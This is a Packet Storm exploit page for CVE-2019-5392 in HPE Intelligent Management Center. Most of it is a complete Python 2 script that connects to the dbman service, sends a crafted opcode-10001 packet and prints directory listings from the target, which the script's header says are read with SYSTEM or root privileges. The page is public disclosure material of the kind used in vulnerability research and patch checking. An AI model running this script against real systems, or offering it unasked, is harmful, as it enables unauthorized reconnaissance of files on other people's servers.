exploit the possibilities

HPE Intelligent Management Center Information Disclosure

HPE Intelligent Management Center Information Disclosure
Posted Sep 23, 2019
Authored by Rishabh Sharma

HPE Intelligent Management Center versions prior to 7.3 E0506P09 suffer from an information disclosure vulnerability.

tags | exploit, info disclosure
advisories | CVE-2019-5392
MD5 | cd1a82ef494a2ecbe81e52a05a81473c

HPE Intelligent Management Center Information Disclosure

Change Mirror Download
#!/opt/local/bin/python2.7

# Exploit Title: HPE Intelligent Management Center dbman Command 10001 Information Disclosure
# Date: 22-09-2019
# Exploit Author: Rishabh Sharma (Linkedin: rishabh2241991)
# Vendor Homepage: www.hpe.com
# Software Link: https://h10145.www1.hpe.com/Downloads/DownloadSoftware.aspx?SoftwareReleaseUId=16759&ProductNumber=JG747AAE&lang=en&cc=us&prodSeriesId=4176535&SaidNumber=
# Tested on Version: iMC_PLAT_7.1_E0302_Standard_Windows and iMC_PLAT_7.2_E0403_Std_Win
# Tested on: Windows 7
# CVE : CVE-2019-5392
# Conversion of Nessus Plugin to Python Exploit
# Nessus Plugin Name: hp_imc_dbman_cmd_10001_info_disclosure.nasl
# Description: This vulnerability allow remote attacker to view the contents of arbitrary directories under the security context of the SYSTEM or root user.
# See Also: https://www.tenable.com/plugins/nessus/118038

from pyasn1.type.univ import *
from pyasn1.type.namedtype import *
from pyasn1.codec.ber import encoder
import struct
import binascii
import socket, sys
import sys
import re

if len(sys.argv) != 4:
print "USAGE: python %s <ip> <port> <directory>" % (sys.argv[0])
sys.exit(1)
else:
ip = sys.argv[1]
port = int(sys.argv[2]) # Default Port 2810
directory = sys.argv[3]
payload = directory.replace("\\","\\\\")
opcode = 10001

try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "Socket Created.."
except socket.error:
print 'Failed to create socket'
sys.exit()
victim_address = (ip,port)
print('connecting to {} port {}'.format(*victim_address))
sock.connect((ip, port))

class DbmanMsg(Sequence):
componentType = NamedTypes(
NamedType('flag', Integer()),
NamedType('dir', OctetString())
)

data = DbmanMsg()
data['flag'] = 1
data['dir'] = payload
encodeddata = encoder.encode(data, defMode=False)
dataLen = len(encodeddata)
values = (opcode, dataLen, encodeddata)
s = struct.Struct(">ii%ds" % dataLen)
packed_data = s.pack(*values)
print 'Format string :', s.format
print 'Uses :',s.size, 'bytes'
print 'Packed Value :', binascii.hexlify(packed_data)
print '\n'
print 'Sending Payload...'
sock.send(packed_data)
BUFF_SIZE = 4000
res = sock.recv(BUFF_SIZE)
rec = len(res)
if (rec == 0):
print "No data in the directory"
else:
print "Data Recived: "+str(rec)
a = repr(res)
b = a
b = re.sub(r'(x\d\d)', '', b)
b = re.sub(r'(\\x[\d].)', '', b)
b = re.sub(r'(\\x..)', '', b)
replacestring = ['"','\\n','\\r','\\t','0']
print "Data in "+payload+" Directory: \n"
for r in replacestring:
b = b.replace(r,'')
b = b.replace("'","")
#print b #Remove '#' if output results is not proper
matches = re.finditer(r"([\\]*)([.[a-zA-Z\d\s]*)", b, re.MULTILINE)
for matchNum, match in enumerate(matches, start=1):

print match.group(2)
print "Done..."
sock.close()
Login or Register to add favorites

File Archive:

May 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    1 Files
  • 2
    May 2nd
    4 Files
  • 3
    May 3rd
    27 Files
  • 4
    May 4th
    17 Files
  • 5
    May 5th
    3 Files
  • 6
    May 6th
    20 Files
  • 7
    May 7th
    0 Files
  • 8
    May 8th
    0 Files
  • 9
    May 9th
    0 Files
  • 10
    May 10th
    0 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    0 Files
  • 14
    May 14th
    0 Files
  • 15
    May 15th
    0 Files
  • 16
    May 16th
    0 Files
  • 17
    May 17th
    0 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    0 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close